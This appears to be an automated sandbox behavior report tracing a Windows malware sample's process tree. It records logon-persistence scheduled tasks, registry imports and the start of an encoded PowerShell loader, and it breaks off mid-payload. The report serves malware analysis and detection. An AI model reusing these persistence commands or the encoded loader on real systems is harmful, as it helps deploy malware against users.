- Executes dropped EXE
PID:5536 -
C:\Users\Admin\AppData\Local\Temp\is-CS0M3.tmp\WinaeroTweaker-1.40.0.0-setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-CS0M3.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$4035E,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:472 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f7⤵PID:1468
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweaker.exe /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1480
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f7⤵PID:6104
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweakerhelper.exe /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6036
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\regmess.exeregmess.exe3⤵
- Executes dropped EXE
PID:5816 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_8874564d-9483-4468-b9a4-649430d57e52\regmess.bat" "4⤵PID:5992
-
C:\Windows\SysWOW64\reg.exereg import Setup.reg /reg:325⤵PID:3548
-
-
C:\Windows\SysWOW64\reg.exereg import Console.reg /reg:325⤵PID:1736
-
-
C:\Windows\SysWOW64\reg.exereg import Desktop.reg /reg:325⤵
- Sets desktop wallpaper using registry
PID:5876
-
-
C:\Windows\SysWOW64\reg.exereg import International.reg /reg:325⤵PID:2952
-
-
C:\Windows\SysWOW64\reg.exereg import Fonts.reg /reg:325⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:5524
-
-
C:\Windows\SysWOW64\reg.exereg import Cursors.reg /reg:325⤵PID:2412
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 103⤵
- Delays execution with timeout.exe
PID:5868
-
-
C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\scary.exescary.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6576 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:6808
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6864 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:6904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fYrbvpmqiGMx.bat" "5⤵PID:7040
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:7088
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7104
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3532 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:6104
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LSMOJZtgmstm.bat" "7⤵PID:6228
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:5372
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6256
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6832 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:4652
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tGAh38iHPXI3.bat" "9⤵PID:4908
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:4500
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6260
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6956 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:7040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2QXZXZYPa7eY.bat" "11⤵PID:6936
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:6780
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2328
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:432 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:3392
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AJa1i16XM3t6.bat" "13⤵PID:6584
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:5488
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4572
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"14⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4896 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:2092
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xNyJbTIhFad0.bat" "15⤵PID:6504
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:6876
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6312
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"16⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6180 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:4028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6hWWQHgZWrLW.bat" "17⤵PID:6592
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:6768
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3976
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"18⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5716 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:5152
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6peHyCULlHoC.bat" "19⤵PID:5576
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:6584
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6696
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"20⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5264 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:2484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DiAhuHpuNldv.bat" "21⤵PID:2732
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:5132
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6436
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"22⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7028 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:6236
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YKqnc1ZPfspj.bat" "23⤵PID:2152
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:6008
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3132
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"24⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7080 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:6252
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UpiN7ekbmdQi.bat" "25⤵PID:6916
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:2340
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3268
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"26⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4296 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f27⤵
- Scheduled Task/Job: Scheduled Task
PID:956
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\T7xhFIVU1CfY.bat" "27⤵PID:6772
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:6872
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:652
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"28⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6104 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f29⤵
- Scheduled Task/Job: Scheduled Task
PID:2224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DFB0QSzpeUza.bat" "29⤵PID:4816
-
C:\Windows\system32\chcp.comchcp 6500130⤵PID:1104
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost30⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3596
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"30⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:472 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f31⤵
- Scheduled Task/Job: Scheduled Task
PID:3964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IzHp3iWnV2XC.bat" "31⤵PID:3028
-
C:\Windows\system32\chcp.comchcp 6500132⤵PID:5520
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost32⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2852
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"32⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7136 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f33⤵
- Scheduled Task/Job: Scheduled Task
PID:2152
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\riiCG9RmTzTR.bat" "33⤵PID:5304
-
C:\Windows\system32\chcp.comchcp 6500134⤵PID:1348
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1504
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"34⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1384 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f35⤵
- Scheduled Task/Job: Scheduled Task
PID:3616
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vb8KdSToi6dQ.bat" "35⤵PID:6512
-
C:\Windows\system32\chcp.comchcp 6500136⤵PID:1824
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost36⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2976
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"36⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2772 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f37⤵
- Scheduled Task/Job: Scheduled Task
PID:6184
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7Cvo5opEdV7y.bat" "37⤵PID:2844
-
C:\Windows\system32\chcp.comchcp 6500138⤵PID:5228
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost38⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4572
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"38⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4408 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f39⤵
- Scheduled Task/Job: Scheduled Task
PID:5244
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\S0EugMpWd2jc.bat" "39⤵PID:4752
-
C:\Windows\system32\chcp.comchcp 6500140⤵PID:1924
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost40⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3624
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"40⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6560 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f41⤵
- Scheduled Task/Job: Scheduled Task
PID:6448
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Poj8z6m09uyp.bat" "41⤵PID:3392
-
C:\Windows\system32\chcp.comchcp 6500142⤵PID:2256
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost42⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3416
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"42⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5396 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f43⤵
- Scheduled Task/Job: Scheduled Task
PID:860
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DKM0u7nR8OEm.bat" "43⤵PID:3752
-
C:\Windows\system32\chcp.comchcp 6500144⤵PID:5908
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost44⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2080
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"44⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7124 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f45⤵
- Scheduled Task/Job: Scheduled Task
PID:6488
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ny5v6xVtMvoA.bat" "45⤵PID:3716
-
C:\Windows\system32\chcp.comchcp 6500146⤵PID:2240
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost46⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6296
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"46⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3204 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f47⤵
- Scheduled Task/Job: Scheduled Task
PID:6404
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RnHgBOhaiKxq.bat" "47⤵PID:5460
-
C:\Windows\system32\chcp.comchcp 6500148⤵PID:5736
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost48⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5428
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"48⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5648 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f49⤵
- Scheduled Task/Job: Scheduled Task
PID:5064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YF2amjcVHsaQ.bat" "49⤵PID:5260
-
C:\Windows\system32\chcp.comchcp 6500150⤵PID:6428
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost50⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5964
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"50⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5520 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f51⤵
- Scheduled Task/Job: Scheduled Task
PID:6548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1hl12TW9cHSt.bat" "51⤵PID:6224
-
C:\Windows\system32\chcp.comchcp 6500152⤵PID:6316
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost52⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2164
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"52⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1096 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f53⤵
- Scheduled Task/Job: Scheduled Task
PID:3624
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1RjQdrGbm1Wv.bat" "53⤵PID:668
-
C:\Windows\system32\chcp.comchcp 6500154⤵PID:4116
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost54⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7096
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"54⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4860 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f55⤵
- Scheduled Task/Job: Scheduled Task
PID:5128
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RizyHG0aDqK6.bat" "55⤵PID:6860
-
C:\Windows\system32\chcp.comchcp 6500156⤵PID:6120
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost56⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2096
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"56⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3088 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f57⤵
- Scheduled Task/Job: Scheduled Task
PID:1296
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HIpFOxRNezLA.bat" "57⤵PID:4872
-
C:\Windows\system32\chcp.comchcp 6500158⤵PID:5676
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost58⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6328
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\the.exethe.exe3⤵
- Executes dropped EXE
PID:6584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYn